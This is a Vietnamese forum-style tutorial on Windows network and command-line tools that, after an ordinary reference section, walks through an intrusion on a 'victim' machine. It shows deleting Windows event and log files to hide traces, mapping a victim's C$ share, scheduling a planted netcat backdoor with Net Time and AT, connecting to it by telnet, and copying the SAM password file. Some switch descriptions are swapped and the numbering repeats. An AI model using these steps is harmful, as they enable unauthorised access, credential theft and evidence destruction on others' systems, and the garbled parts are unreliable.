Một số lệnh cơ bản trong mạng LAN hay được sử dụng, nhất là dùng để kiểm tra, điều khiển, hay truy cập từ xa tới máy tính khác trong mạng LAN. Các lệnh này hoàn toàn có thể dùng những công cụ khác có sẵn của Windows như cmd.exe để thực hiện, hoặc dùng chương trình để thực hiện thay thế cho việc dùng dòng lệnh.
1.Lệnh Ping
Chức năng: Lệnh Ping được dùng để thử xem mạng TCP/IP có trở ngại gì giữa các computers không hoặc để kiểm tra xem một máy tính có kết nối với mạng không.
Cú pháp: ping ip/host [/t][/a][/l][/n]
Chú thích:
- ip/host: ip là địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính
Ví dụ: ping 192.168.1.1
- [/t]: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C
- [/a]: Nhận địa chỉ IP từ tên host
- [/l]: Xác định số gói tin sẽ gửi đi.
Ví dụ: ping 192.168.1.1/n 5
- [/n]: Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS).
Ví dụ: ping 192.168.1.1 /l 65535
Ngoài ra, còn một số thông tin khác, bạn có thể tự tham khảo với câu lệnh ping /?
Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....
2. Lệnh IPConfig
Chức năng: Ta dùng lệnh IPConfig khi cần biết trạng thái của TCP/IP configuration của computer. Khi dùng lệnh IPConfig với /all switch, chương trình sẽ hiển thị một báo cáo chi tiết về configuration của tất cả card mạng, kể cả các miniports mạng rộng (Wide Area Network) nào hiện diện, thường dùng cho remote access hay các móc nối Virtual Private Network (VPN). Với DNS dynamics update bạn cũng có thể dùng IPConfig để đăng ký computer vào dịch vụ DNS.
Cú pháp: ipconfig /all
Chú thích: Có một số switches khác của lệnh IPConfig cũng rất thông dụng:
- /flushdns: Xóa bỏ cache chứa tên trong DNS
- /registerdns: Làm mới lại tất cả Dynamic Host Configuration Protocol (DHCP) leases và đăng ký lại tất cả tên DNS. Một lease là một hợp đồng mà DHCP cho phép một computer được dùng một IP Address trong thời hạn bao lâu.
- /displaydns: Hiển thị cache của DNS resolver
- /release: [Card (adapter)] Hủy bỏ lease về một IP Address cho một cạt. Nếu không nói rõ tên cạt nào thì DHCP hủy bỏ mọi leases
- /renew: [Card (adapter)] Phát hành một lease mới với IP Address cho một cạt. Nếu không nói rõ tên cạt nào thì DHCP phát hành lease mới cho mọi card.
Bạn nên thận trọng khi dùng lệnh IPConfig trên client computer. Có nhiều features tân tiến của IPConfig tuy hay nhưng không nên dùng trên một máy client nếu không được sự trợ giúp của một administrator về mạng. Dùng lệnh nầy sai lạc có thể làm cho client computer mất móc nối với server.
Ðể biết thêm về các switches của IPConfig hãy đánh IPConfig /?
3. Lệnh Tracert
Chức năng: Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào...
Cú pháp: tracert ip/host
Chú thích: ip là địa chỉ IP của máy đích; host là tên của máy tính đích. Ngoài ra chỉ cần đánh Tracert sẽ hiển thị chỉ dẩn như sau:
4. Lệnh Netstat
Chức năng: Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta. Nếu bạn sử dụng lệnh này mà thấy mấy cái port đang ở chế độ listening lạ hoắc thì yên chí là máy bạn dính trojan rồi đấy. Cẩn thận kẻo mất password
Cú pháp: Netstat [/a][/e][/n]
Chú thích:
- [/a]: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)
- [/e]: hiển thị các thông tin thống kê Ethernet
- [/n]: Hiển thị các địa chỉ và các số cổng kết nối...
Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm
5. Lệnh FTP
Chức năng: FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp.
Cú pháp: ftp ip/host
Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập Username và pass. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.
Chú thích: Một số lệnh ftp cơ bản.
- CD <thu_muc>: chuyển sang thư mục khác trên máy chủ
- DIR: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ
- MDIR <thu_muc>: Tạo một thư mục mới có tên thu_muc trên máy chủ
- RMDIR <thu_muc>: Xoá (remove directory) một thư mục trên máy chủ
- PUT FILE: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.
- CLOSE: Đóng phiên làm việc
- QUIT: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa, xin mời các bạn tìm hiểu thêm.
Như vậy, từ nay trở đi, nếu bạn nào có một website riêng thì không cần phải lo đến chuyện phải có chương trình ftp nữa nhé. Dùng lệnh này, đảm bảo chạy ở đâu cũng được (tất nhiên trừ những mạng máy tính sử dụng proxy).
6. Lệnh Telnet
Chức năng: Telnet là một ứng dụng cho phép người dùng ngồi trên một thiết bị đầu cuối có thể thông qua kết nối mạng đến một thiết bị từ xa để điều khiển nó bằng câu lệnh như là đang ngồi tại máy ở xa. Telnet cho phép tạo kết nối với thiết bị từ xa, thu thập thông tin và chạy chương trình.
Cú pháp: telnet IP/host port
Chú thích: - ip là địa chỉ IP của thiết bị đầu cuối; host là tên của thiết bị đầu cuối.
- port là cổng để giao tiếp với thiết bị đầu cuối.
Ví dụ: telnet 192.168.1.1 80 sẽ thiết lập phiên telnet với thiết bị có địa chỉ IP là 192.168.1.1 với port là 80
Ngoài ra bạn cũng có thể sử dụng lệnh telnet /? để tìm hiểu một số tham số khác
7. Lệnh NSLookup
Chức năng: NSLookup là một công cụ tiện dụng để giải quyết những khó khăn về DNS, chẳng hạn như host name resolution (tìm IP Address của một computer) bằng cách đọc những records trong DNS database.
Cú pháp: nslookup <name server>
Chú thích:
- name là host name của record mà bạn đang tìm
- server là tên của server mà bạn muốn hỏi.
Nếu server không được cung cấp thì sẽ chọn default server.
8. Lệnh NET
Lệnh NET là một lệnh ngoại trú (tức là không có sẵn) nhưng nó luôn được đi kèm với hầu hết các hệ điều hành Windows của Microsoft và nó là một lệnh rất cần thiết và quang trọng dùng để xâm nhập một hệ thống lệnh NET không đi một mình mà nó đi chung với những phương thức khác để kết hợp thành một tổ hợp cụ thể. Chính vì tầm quang trọng của nó nên tôi tách hẳn nó ra thành một chương riêng biệt
• NET VIEW
Chức năng: Lệnh này cho phép xem danh sách các máy trong mạng, hoặc xem các tài nguyên chia sẻ tại một máy trên mạng
Cú pháp: net view \\IP/host
Chú thích:
- ip là địa chỉ IP của máy tính hoặc domain; host là tên của máy tính hoặc domain.
Nếu chỉ đánh net view và nhấn enter, thì nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
Nếu đánh net view \\IP hoặc \\host, thì nó sẽ hiển thị các tài nguyên chia sẻ của máy tính đó.
• NET USE
Chức năng: Lệnh này dùng để kết nối máy của người đang thực hiện tới một tài nguyên được chia sẽ trên hệ thống mạng với một quyền hạn nhất định.
Cú pháp: Net use \\IP/host\Sharedata "Password" /user:"User"
(Dùng để kết nối tới một tài nguyên nhất định khi biết username và password)
Net use \\ IP/host \ipc$ "Password" /user:"User"
(Dùng để kết nối một IPC$ đến máy tính)
Chú thích:
- ip là địa chỉ IP của máy tính chứa tài nguyên chia sẽ; host là tên của máy tính chứa tài nguyên chia sẽ.
- Sharedata là tài nguyên chia sẽ
- User là tên user được cấp trước
- Password là password của user
Ví dụ: Để kết nối ICP$ đến máy có địa chỉ IP là 192.168.1.2 với username là administrator và password là 123456
Net use \\192.168.1.2\ipc$ "123456" /user:"administrator"
• NET USER
Chức năng: Lệnh này dùng để Tạo/Xóa tài khoản người dùng, hoặc hiện danh sách tài khoản nếu không có tham số.
Cú pháp: Net User [username pass] [/add]
(tạo người dùng có tên là username và password)
Net User [username] [/delete]
(xóa người dùng có tên là username)
Chú thích:
- Username : tên người dùng
- pass : mật khẩu của người dùng
• NET SHARE
Chức năng: Lệnh này dùng để chia sẽ tài nguyên trên máy tính
Cú pháp: Net share sharename=path
Chú thích:
- path ở đây có thể là một ổ đĩa hoặc đường dẫn tuyệt đối tới một thư mục hoặc máy in .v.v.
Ví dụ: Net share DATA=C:\ /Unlimited
(Chia sẽ ổ đĩa C:\ lấy tên là ổ data với quyền truy cập không giới hạn)
Một số lệnh khác:
10. Lệnh Shutdown: Cú pháp: Code: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d upx:yy] (áp dụng cho win XP) - Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,.. - Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown. - Tham số -l : logg off (lưu ý ko thể thực hiện khi remote) - Tham số -s : shutdown - Tham số -r : shutdown và restart - Tham số -a : không cho shutdown - Tham số -f : shutdown mà ko cảnh báo - Tham số -c "comment" : lời cảnh báo trước khi shutdown - Tham số -d upx:yy : ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công dụng: + Shutdown máy tính.
11. Lệnh DIR : Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn. Công dụng: + Để xem file, folder.
12. Lệnh DEL : Cú pháp: Code: DEL [drive:][path][filename] Lệnh này cũng căn bản rùi, ko phải nói nhìu. Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT: Code: del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log
13. Lệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là IPC$ ) - Z là của mình...còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14. Lệnh Net Time : Cú pháp: Code: Net Time \\ip Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT: Cú pháp: Code: AT \\ip Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet: Cú pháp: Code: telnet host port Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie Code: telnet 68.135.23.25 99 Công dụng: + Kết nối đến host qua port xx
17. Lệnh COPY: Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn! Công dụng: + Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code: Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET: Cú pháp: Code: SET Công dụng: + Displays, sets, or removes cmd.exe enviroment variables. 19. Lệnh Nbtstat: Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này. Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP) Trên đây là một số hiểu biết hạn hẹp của em về các lệnh CMD, em đã đọc được từ rất nhiều nguồn khác nhau, nay tổng hợp lại cho mọi người tham khảo. Có một số lệnh em vẫn chưa hiểu cấu trúc lệnh và chưa có điều kiện để thực hành thử nên ko hướng dẫn kỹ. Ai biết thì góp ý nhé! Mong các pro đừng cười! Nếu thấy bài viết của em hay thì làm ơn thank cho một cái nhé
19. bootcfg : xem thiết lập phần tải hệ điều hành ban đầu .
20. defrag : lệnh này dùng để dồn đĩa cứng .
21. diskpart : quản lí phân vùng trên đĩa . Chúng ta có thể bấm DISKPART / ? để xem hướng dẫn cách dùng chi tiết .
22. driverquery : nhận danh sách các chương trình Driver và những thuộc tính của chúng .
23. getmac : nhận địa chỉ MAC ( Media Access Control ) của Card mạng .
24. gpresult : nhận RSoP , những thiết lập người dùng và những thiết lập của chính sách nhóm.
25. netsh : công cụ cấu hình mạng . Bấm NETSH / ? để biết thêm chi tiết . Để thoát khỏi công cụ này gõ lệnh NETSH>
26. openfiles : cho phép Admin hiển thị hoặc bỏ kết nối những file đang mở trong XP Pro . Bấm OPENFILES/? để biết thêm về tham số .
27. recover : khôi phục những thông tin không thể đọc được trên đĩa .
28. reg : công cụ cho Registry .
29. schtasks : Admin có thể tạo lịch trình , thay đổi , xoá những nhiệm vụ trên máy trạm hoặc những máy điều khiển từ xa . SCHTASKS/? để hiển thị những tham số .
30. sfc : kiểm tra file hệ thống , bảo về và thay thế , sửa chữa những file hệ thống bị hỏng .
31. shutdown : bạn có thể tắt hoặc khởi động lại máy tính của mình hoặc Admin có thể tắt hoặc khởi động lại những máy tính điều khiển từ xa .
32. systeminfo : hiển thị những thông tin cấu hình cơ bản .
33. tasklist : cho chúng ta biết những chương trình nào đang chạy .
34. taskkill : tắt những chương trình đang chạy
35. dxdiag : cấu hình
